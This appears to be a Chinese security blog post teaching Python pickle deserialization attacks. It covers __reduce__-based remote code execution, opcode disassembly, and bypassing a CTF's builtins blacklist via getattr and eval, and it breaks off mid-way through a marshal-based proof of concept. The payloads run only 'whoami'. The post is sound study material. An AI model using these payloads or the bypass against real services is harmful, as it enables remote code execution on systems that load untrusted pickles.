<!DOCTYPE html>
<html lang=en>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="概述Python中序列化一般有两种方式: pickle&#x2F;cPickle模块和json模块, 前者是Python特有的格式, 后者是json通用的格式。 Pickle有如下四种常用方法    函数 说明    pickle.dump(obj, file) 对象反序列化到文件对象并存入文件   pickle.dumps(obj) 将对象序列化成字符串格式的字节流   pickle.load(file)">
<meta property="og:type" content="article">
<meta property="og:title" content="python反序列化漏洞">
<meta property="og:url" content="http://p5ych2022.github.io/2024/09/25/python%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/index.html">
<meta property="og:site_name" content="psych&#39;s blog">
<meta property="og:description" content="概述Python中序列化一般有两种方式: pickle&#x2F;cPickle模块和json模块, 前者是Python特有的格式, 后者是json通用的格式。 Pickle有如下四种常用方法    函数 说明    pickle.dump(obj, file) 对象反序列化到文件对象并存入文件   pickle.dumps(obj) 将对象序列化成字符串格式的字节流   pickle.load(file)">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/p5ych2022/IHS@master/img/image-20240925172703060.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/p5ych2022/IHS@master/img/image-20240925172606596.png">
<meta property="article:published_time" content="2024-09-25T09:29:24.000Z">
<meta property="article:modified_time" content="2024-09-25T09:30:58.442Z">
<meta property="article:author" content="psych">
<meta property="article:tag" content="web">
<meta property="article:tag" content="python">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://cdn.jsdelivr.net/gh/p5ych2022/IHS@master/img/image-20240925172703060.png">
    
    
      
        
          <link rel="shortcut icon" href="/images/favicon.ico">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
        
      
    
    <!-- title -->
    <title>python反序列化漏洞</title>
    <!-- async scripts -->
    <!-- Google Analytics -->


    <!-- Umami Analytics -->


    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
      <link rel="alternate" href="/true" title="psych&#39;s blog" type="application/atom+xml" />
    
	<!-- mathjax -->
	
<meta name="generator" content="Hexo 6.3.0"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" aria-label="Top" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fa-solid fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/about/">About</a></li><!--
     --><!--
       --><li><a href="/archives/">Article</a></li><!--
     --><!--
       --><li><a href="/tags/">Tag</a></li><!--
     --><!--
       --><li><a href="/categories/">Category</a></li><!--
     --><!--
       --><li><a href="/search/">Search</a></li><!--
     -->
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        
        <li><a class="icon" aria-label="Next post" href="/2024/06/17/%E8%AE%A1%E7%AE%97%E6%9C%BA%E7%BD%91%E7%BB%9C/"><i class="fa-solid fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" aria-label="Back to top" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="Share post" href="#"><i class="fa-solid fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://p5ych2022.github.io/2024/09/25/python%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://p5ych2022.github.io/2024/09/25/python%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/&text=python反序列化漏洞"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://p5ych2022.github.io/2024/09/25/python%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/&title=python反序列化漏洞"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://p5ych2022.github.io/2024/09/25/python%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/&is_video=false&description=python反序列化漏洞"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=python反序列化漏洞&body=Check out this article: http://p5ych2022.github.io/2024/09/25/python%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/"><i class="fa-solid fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://p5ych2022.github.io/2024/09/25/python%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/&title=python反序列化漏洞"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://p5ych2022.github.io/2024/09/25/python%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/&title=python反序列化漏洞"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://p5ych2022.github.io/2024/09/25/python%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/&title=python反序列化漏洞"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://p5ych2022.github.io/2024/09/25/python%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/&title=python反序列化漏洞"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://p5ych2022.github.io/2024/09/25/python%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/&name=python反序列化漏洞&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=http://p5ych2022.github.io/2024/09/25/python%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/&t=python反序列化漏洞"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    
    
      <div id="toc">
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%A6%82%E8%BF%B0"><span class="toc-number">1.</span> <span class="toc-text">概述</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Pickle"><span class="toc-number">2.</span> <span class="toc-text">Pickle</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#OPcode-Operation-Code"><span class="toc-number">2.1.</span> <span class="toc-text">OPcode(Operation Code)</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%89%B9%E6%80%A7"><span class="toc-number">2.2.</span> <span class="toc-text">特性</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Blacklist-%E7%BB%95%E8%BF%87"><span class="toc-number">3.</span> <span class="toc-text">Blacklist 绕过</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%9E%84%E9%80%A0-opcode"><span class="toc-number">3.1.</span> <span class="toc-text">构造 opcode</span></a></li></ol></li></ol>
      </div>
    
  </span>
</div>

    
    <div class="content index py4 ">
        
        <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle p-name" itemprop="name headline">
        python反序列化漏洞
    </h1>



    <div class="meta">
      <span class="author p-author h-card" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span class="p-name" itemprop="name">psych</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2024-09-25T09:29:24.000Z" class="dt-published" itemprop="datePublished">2024-09-25</time>
        
      
    </div>


      
    <div class="article-category">
        <i class="fa-solid fa-archive"></i>
        <a class="category-link" href="/categories/web/">web</a> › <a class="category-link" href="/categories/web/web%E5%9F%BA%E7%A1%80/">web基础</a>
    </div>


      
    <div class="article-tag">
        <i class="fa-solid fa-tag"></i>
        <a class="p-category" href="/tags/python/" rel="tag">python</a>, <a class="p-category" href="/tags/web/" rel="tag">web</a>
    </div>


    </div>
  </header>
  

  <div class="content e-content" itemprop="articleBody">
    <h1 id="概述"><a href="#概述" class="headerlink" title="概述"></a>概述</h1><p><code>Python</code>中序列化一般有两种方式: <code>pickle/cPickle</code>模块和<code>json</code>模块, 前者是<code>Python</code>特有的格式, 后者是<code>json</code>通用的格式。</p>
<h1 id="Pickle"><a href="#Pickle" class="headerlink" title="Pickle"></a><strong>Pickle</strong></h1><p>有如下四种常用方法</p>
<table>
<thead>
<tr>
<th>函数</th>
<th>说明</th>
</tr>
</thead>
<tbody><tr>
<td><code>pickle.dump(obj, file)</code></td>
<td>对象反序列化到文件对象并存入文件</td>
</tr>
<tr>
<td><code>pickle.dumps(obj)</code></td>
<td>将对象序列化成字符串格式的字节流</td>
</tr>
<tr>
<td><code>pickle.load(file)</code></td>
<td>读取文件， 将文件中的序列化内容反序列化为对象</td>
</tr>
<tr>
<td><code>pickle.loads(bytes_obj)</code></td>
<td>将字符串格式的字节流反序列化为对象</td>
</tr>
</tbody></table>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">注意：file文件需要以 2 进制方式打开，如 `wb`、`rb`</span><br></pre></td></tr></table></figure>

<p>除去文件，一种简单的工作方式涉及到：</p>
<ul>
<li><strong>序列化</strong>（<code>pickle.dumps</code>）：将 Python 对象转换为字节流。</li>
<li><strong>反序列化</strong>（<code>pickle.loads</code>）：将字节流转换回 Python 对象。</li>
</ul>
<p>给出一个示例漏洞代码</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> pickle</span><br><span class="line"><span class="keyword">import</span> os</span><br><span class="line"></span><br><span class="line"><span class="keyword">class</span> <span class="title class_">PickleRCE</span>(<span class="title class_ inherited__">object</span>):</span><br><span class="line">    <span class="keyword">def</span> <span class="title function_">__reduce__</span>(<span class="params">self</span>):</span><br><span class="line">        <span class="keyword">return</span> (os.system, (<span class="string">&#x27;whoami&#x27;</span>,))  <span class="comment"># 这里尝试执行系统命令</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 创建恶意pickle数据</span></span><br><span class="line">Pickle_RCE = pickle.dumps(PickleRCE())</span><br><span class="line"></span><br><span class="line"><span class="comment"># 反序列化恶意数据</span></span><br><span class="line">pickle.loads(Pickle_RCE)  <span class="comment"># 反序列化时会自动调用里面的__reduce__方法，从而 RCE</span></span><br></pre></td></tr></table></figure>

<p>在这个示例中，<code>PickleRCE</code> 类通过<code>__reduce__</code>方法定义了在反序列化时应该执行的操作，即执行<code>os.system(&#39;whoami&#39;)</code>，这是一个常用来查看当前用户的系统命令。</p>
<p>触发原理是：在<code>pickle</code>的反序列化过程中，如果反序列化的对象包含特定的方法，如<code>__reduce__</code>或<code>__reduce_ex__</code>，这些方法在<strong>反序列化</strong>时会被自动调用(类似于 PHP 中的 <code>wakeup()</code>)，从而可能执行其中定义的任意代码。这正是<code>pickle</code>反序列化漏洞的核心所在。</p>
<p>与 PHP 反序列化漏洞不同的是(PHP 反序列化漏洞要求源代码中必须存在有问题的类，且对象参数可控可生成恶意对象)，而 Python 反序列化漏洞，只需要被反序列化的字符可控即可造成 RCE(可自己创建危险方法来命令执行)</p>
<h2 id="OPcode-Operation-Code"><a href="#OPcode-Operation-Code" class="headerlink" title="OPcode(Operation Code)"></a>OPcode(Operation Code)</h2><p>通过 dumps 方式序列化之后，对应的字符串是 Pickle 的OPcode，我们可以再 <a target="_blank" rel="noopener" href="http://pickle.py/">pickle.py</a>(位于 python 的 lib 中) 中看到详解(python312为例)：</p>
<p><img src="https://cdn.jsdelivr.net/gh/p5ych2022/IHS@master/img/image-20240925172703060.png" alt="image-20240925172703060"></p>
<p>可以看到有多个 protocol 版本，整体是向下兼容的。可以在序列化时指定，如：<code>dumps(aaa, 0)</code></p>
<p>我们利用一个例子来学习常见的 OPcode</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> pickle</span><br><span class="line"><span class="keyword">import</span> pickletools</span><br><span class="line"><span class="keyword">import</span> os</span><br><span class="line"></span><br><span class="line"><span class="keyword">class</span> <span class="title class_">RCE</span>(): <span class="comment">#类名</span></span><br><span class="line">    <span class="keyword">def</span> <span class="title function_">__init__</span>(<span class="params">self</span>):</span><br><span class="line">        self.age=<span class="number">18</span></span><br><span class="line">    <span class="keyword">def</span> <span class="title function_">__reduce__</span>(<span class="params">self</span>):</span><br><span class="line">        <span class="keyword">return</span> (os.system, (<span class="string">&#x27;whoami&#x27;</span>,))</span><br><span class="line"></span><br><span class="line">R=RCE()</span><br><span class="line">opcode=pickle.dumps(R, <span class="number">0</span>)  <span class="comment"># 指定 protocol = 0</span></span><br><span class="line">pickletools.dis(opcode)</span><br><span class="line"><span class="built_in">print</span>(<span class="string">&#x27;----&#x27;</span>)</span><br><span class="line"><span class="built_in">print</span>(opcode)</span><br></pre></td></tr></table></figure>

<p>结果</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">D:\\code\\py\\hack\\venv\\Scripts\\python.exe D:\\code\\py\\hack\\pickle01.py </span><br><span class="line">    <span class="number">0</span>: c    GLOBAL     <span class="string">&#x27;nt system&#x27;</span>   <span class="comment"># 向栈顶压入`nt.system`这个可执行对象</span></span><br><span class="line">   <span class="number">11</span>: p    PUT        <span class="number">0</span>             <span class="comment"># 将这个对象存储到memo的第0个位置</span></span><br><span class="line">   <span class="number">14</span>: (    MARK                     <span class="comment"># 压入一个元组的开始标志</span></span><br><span class="line">   <span class="number">15</span>: V        UNICODE    <span class="string">&#x27;whoami&#x27;</span>  <span class="comment"># 压入一个字符串</span></span><br><span class="line">   <span class="number">23</span>: p        PUT        <span class="number">1</span>         <span class="comment"># 将这个字符串存储到memo的第1个位置</span></span><br><span class="line">   <span class="number">26</span>: t        TUPLE      (MARK at <span class="number">14</span>) <span class="comment"># 将由刚压入栈中的元素弹出，再将由这个元素组成的元组压入栈中</span></span><br><span class="line">   <span class="number">27</span>: p    PUT        <span class="number">2</span>             <span class="comment"># 将这个元组存储到memo的第2个位置</span></span><br><span class="line">   <span class="number">30</span>: R    REDUCE                   <span class="comment"># 从栈上弹出两个元素，分别是可执行对象和元组，并执行，结果压入栈中</span></span><br><span class="line">   <span class="number">31</span>: p    PUT        <span class="number">3</span>             <span class="comment"># 将栈顶的元素（也就是刚才执行的结果）存储到memo的第3个位置</span></span><br><span class="line">   <span class="number">34</span>: .    STOP                     <span class="comment"># 结束整个程序</span></span><br><span class="line">highest protocol among opcodes = <span class="number">0</span></span><br><span class="line">----</span><br><span class="line"><span class="string">b&#x27;cnt\\nsystem\\np0\\n(Vwhoami\\np1\\ntp2\\nRp3\\n.</span></span><br></pre></td></tr></table></figure>

<h2 id="特性"><a href="#特性" class="headerlink" title="特性"></a>特性</h2><p>反序列化执行 <strong>reduce</strong> 魔术方法，在 return 时，回自动导入源代码中没有引入的模块，例如：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> pickle</span><br><span class="line">s =<span class="string">&quot;cos\\nsystem\\n(S&#x27;whoami&#x27;\\ntR.&quot;</span>  <span class="comment"># 可以自己写一个恶意类然后生成str</span></span><br><span class="line">pickle.loads(s)  <span class="comment"># 实际上会执行 os.system(&#x27;whoami&#x27;)，但是可以看到源代码中并未导入 os 模块</span></span><br></pre></td></tr></table></figure>

<p>这极大地拓宽了我们的攻击面。其中 s 的构造可以自己写一个类去构造。规则就是 PVM 的操作码，py2 和 py3 不同，主要看环境。</p>
<h1 id="Blacklist-绕过"><a href="#Blacklist-绕过" class="headerlink" title="Blacklist 绕过"></a>Blacklist 绕过</h1><p>我们查看<a target="_blank" rel="noopener" href="https://docs.python.org/3.7/library/pickle.html#pickle-restrict">官方推荐</a>的沙箱机制</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> builtins</span><br><span class="line"><span class="keyword">import</span> io</span><br><span class="line"><span class="keyword">import</span> pickle</span><br><span class="line"></span><br><span class="line">safe_builtins = &#123;</span><br><span class="line">    <span class="string">&#x27;range&#x27;</span>,</span><br><span class="line">    <span class="string">&#x27;complex&#x27;</span>,</span><br><span class="line">    <span class="string">&#x27;set&#x27;</span>,</span><br><span class="line">    <span class="string">&#x27;frozenset&#x27;</span>,</span><br><span class="line">    <span class="string">&#x27;slice&#x27;</span>,</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">class</span> <span class="title class_">RestrictedUnpickler</span>(pickle.Unpickler):</span><br><span class="line"></span><br><span class="line">    <span class="keyword">def</span> <span class="title function_">find_class</span>(<span class="params">self, module, name</span>):</span><br><span class="line">        <span class="comment"># Only allow safe classes from builtins.</span></span><br><span class="line">        <span class="keyword">if</span> module == <span class="string">&quot;builtins&quot;</span> <span class="keyword">and</span> name <span class="keyword">in</span> safe_builtins:</span><br><span class="line">            <span class="keyword">return</span> <span class="built_in">getattr</span>(builtins, name)</span><br><span class="line">        <span class="comment"># Forbid everything else.</span></span><br><span class="line">        <span class="keyword">raise</span> pickle.UnpicklingError(<span class="string">&quot;global &#x27;%s.%s&#x27; is forbidden&quot;</span> %</span><br><span class="line">                                     (module, name))</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">restricted_loads</span>(<span class="params">s</span>):</span><br><span class="line">    <span class="string">&quot;&quot;&quot;Helper function analogous to pickle.loads().&quot;&quot;&quot;</span></span><br><span class="line">    <span class="keyword">return</span> RestrictedUnpickler(io.BytesIO(s)).load()</span><br></pre></td></tr></table></figure>

<p>用白名单的形式且限制了反序列化的对象必须是<code>builtins</code>模块中的对象。</p>
<p>p 牛在<a target="_blank" rel="noopener" href="https://github.com/phith0n/code-breaking/tree/master/2018/picklecode">code-breaking 2018 picklecode</a> 中改写这个<code>find_class</code>，改成了黑名单方式：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> pickle</span><br><span class="line"><span class="keyword">import</span> io</span><br><span class="line"><span class="keyword">import</span> builtins</span><br><span class="line"></span><br><span class="line">__all__ = (<span class="string">&#x27;PickleSerializer&#x27;</span>, )</span><br><span class="line"></span><br><span class="line"><span class="keyword">class</span> <span class="title class_">RestrictedUnpickler</span>(pickle.Unpickler):</span><br><span class="line">    blacklist = &#123;<span class="string">&#x27;eval&#x27;</span>, <span class="string">&#x27;exec&#x27;</span>, <span class="string">&#x27;execfile&#x27;</span>, <span class="string">&#x27;compile&#x27;</span>, <span class="string">&#x27;open&#x27;</span>, <span class="string">&#x27;input&#x27;</span>, <span class="string">&#x27;__import__&#x27;</span>, <span class="string">&#x27;exit&#x27;</span>&#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">def</span> <span class="title function_">find_class</span>(<span class="params">self, module, name</span>):</span><br><span class="line">        <span class="comment"># Only allow safe classes from builtins.</span></span><br><span class="line">        <span class="keyword">if</span> module == <span class="string">&quot;builtins&quot;</span> <span class="keyword">and</span> name <span class="keyword">not</span> <span class="keyword">in</span> self.blacklist:</span><br><span class="line">            <span class="keyword">return</span> <span class="built_in">getattr</span>(builtins, name)</span><br><span class="line">        <span class="comment"># Forbid everything else.</span></span><br><span class="line">        <span class="keyword">raise</span> pickle.UnpicklingError(<span class="string">&quot;global &#x27;%s.%s&#x27; is forbidden&quot;</span> %</span><br><span class="line">                                     (module, name))</span><br><span class="line">......</span><br></pre></td></tr></table></figure>

<p>这里黑名单的形式就意味着从 <code>builtins</code> 入手可能找到绕过黑名单的方式。</p>
<blockquote>
<p>关于 <code>builtins</code>，GPT4 解释：在 Python 中，<code>builtins</code> 模块是一个非常特殊的模块，因为它提供了所有 Python 内置函数的访问，这些内置函数是 Python 解释器的核心组成部分，无需任何导入就可以在任何地方使用。这些内置功能包括基础类型（如 <code>int</code>, <code>float</code>, <code>dict</code>）、内置函数（如 <code>print()</code>, <code>len()</code>）、异常类型（如 <code>ValueError</code>, <code>KeyError</code>）等。</p>
</blockquote>
<p>同时，GPT 还说：</p>
<blockquote>
<ul>
<li><strong>不要轻易覆盖</strong>：由于 <code>builtins</code> 模块中的元素是全局可用的，覆盖这些内置的名称可能会导致意想不到的行为。例如，重新定义 <code>list</code> 或 <code>open</code> 可能会在代码的其他部分引发错误。</li>
<li><strong>安全性</strong>：在执行动态操作时，如使用 <code>getattr</code> 访问 <code>builtins</code>，应当小心，避免执行不安全或未经验证的输入，这可能导致安全漏洞。</li>
</ul>
</blockquote>
<p>我们先看看这个使用 <code>getattr</code> 访问 <code>builtins</code> 是怎么个事</p>
<blockquote>
<p>使用 <code>getattr</code> 函数来访问 Python 的 <code>builtins</code> 模块可以提供一种动态调用内置函数或访问内置对象的方法。基本用法是 <code>getattr(object, name[, default]</code>，其中：</p>
<ul>
<li><code>object</code> 是你想从中获取属性的对象。</li>
<li><code>name</code> 是一个字符串，表示你想获取的属性名。</li>
<li><code>default</code> 是可选的，如果指定的属性不存在时返回的值。</li>
</ul>
<p>在 <code>builtins</code> 模块的上下文中，<code>object</code> 将是 <code>builtins</code> 模块本身。</p>
</blockquote>
<p>我们可以通过<code>builtins.getattr(&#39;builtins&#39;, &#39;eval&#39;)</code>来获取eval函数，然后再执行，此时使用的模块是 <code>builtins</code> 而方法是 <code>getattr</code> ，绕过黑名单校验。</p>
<p>现在我们需要构造出这个 pickle 的 opcode 然后执行序列化操作从而执行我们构造的 eval</p>
<h2 id="构造-opcode"><a href="#构造-opcode" class="headerlink" title="构造 opcode"></a>构造 opcode</h2><p>目前的思路是我们要构造 pickle code，来执行：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">func = <span class="built_in">getattr</span>(<span class="built_in">__import__</span>(<span class="string">&#x27;builtins&#x27;</span>), <span class="string">&#x27;eval&#x27;</span>)</span><br><span class="line">func(<span class="string">&#x27;__import__(&quot;os&quot;).system(&quot;whoami&quot;)&#x27;</span>)</span><br></pre></td></tr></table></figure>

<p>但是我们没办法直接通过 reduce 来执行这条：</p>
<img src="https://cdn.jsdelivr.net/gh/p5ych2022/IHS@master/img/image-20240925172606596.png" alt="image-20240925172606596" style="zoom:33%;" />

<p>因为 reduce 必须返回一个包含两部分的元组：一个可调用对象，用于重新创建序列化对象；一个元组，该元组包含传递给第一个元素（可调用对象）的参数。也就是说只能执行一个函数，而我们需要执行两个函数。所以要想办法手搓 opcode。</p>
<p>pickle的内容存储在如下两个位置中：</p>
<ul>
<li>stack 栈</li>
<li>memo 一个列表，可以存储信息</li>
</ul>
<p>对于之前那个简单的例子生成的opcode(<code>b&#39;cnt\\nsystem\\np0\\n(Vwhoami\\np1\\ntp2\\nRp3\\n.</code>)</p>
<p>做出解释：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"> <span class="number">0</span>: c    GLOBAL     <span class="string">&#x27;nt system&#x27;</span>   <span class="comment"># 向栈顶压入`nt.system`这个可执行对象</span></span><br><span class="line"><span class="number">11</span>: p    PUT        <span class="number">0</span>             <span class="comment"># 将这个对象存储到memo的第0个位置</span></span><br><span class="line"><span class="number">14</span>: (    MARK                     <span class="comment"># 压入一个元组的开始标志</span></span><br><span class="line"><span class="number">15</span>: V        UNICODE    <span class="string">&#x27;whoami&#x27;</span>  <span class="comment"># 压入一个字符串</span></span><br><span class="line"><span class="number">23</span>: p        PUT        <span class="number">1</span>         <span class="comment"># 将这个字符串存储到memo的第1个位置</span></span><br><span class="line"><span class="number">26</span>: t        TUPLE      (MARK at <span class="number">14</span>) <span class="comment"># 将由刚压入栈中的元素弹出，再将由这个元素组成的元组压入栈中</span></span><br><span class="line"><span class="number">27</span>: p    PUT        <span class="number">2</span>             <span class="comment"># 将这个元组存储到memo的第2个位置</span></span><br><span class="line"><span class="number">30</span>: R    REDUCE                   <span class="comment"># 从栈上弹出两个元素，分别是可执行对象和元组，并执行，结果压入栈中</span></span><br><span class="line"><span class="number">31</span>: p    PUT        <span class="number">3</span>             <span class="comment"># 将栈顶的元素（也就是刚才执行的结果）存储到memo的第3个位置</span></span><br><span class="line"><span class="number">34</span>: .    STOP                     <span class="comment"># 结束整个程序</span></span><br></pre></td></tr></table></figure>

<p>接下来想办法构造出 opcode</p>
<ol>
<li>可以直接使用marshell工具直接梭哈，但是它的原理是使用了<code>types.FunctionType</code> 同样不是白名单模块，这里还是先列一下 POC，生成恶意 opcode</li>
</ol>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> base64</span><br><span class="line"><span class="keyword">import</span> marshal</span><br><span class="line"><span class="keyword">import</span> types</span><br><span class="line"><span class="keyword">import</span> ctypes</span><br><span class="line"><span class="keyword">import</span> builtins</span><br><span class="line"><span class="keyword">def</span> <span class="title function_">foo</span>():</span><br><span class="line">    <span class="comment"># 执行系统命令 &#x27;whoami&#x27;</span></span><br><span class="line">    <span class="built_in">getattr</span>(<span class="built_in">__import__</span>(<span class="string">&#x27;builtins&#x27;</span>), <span 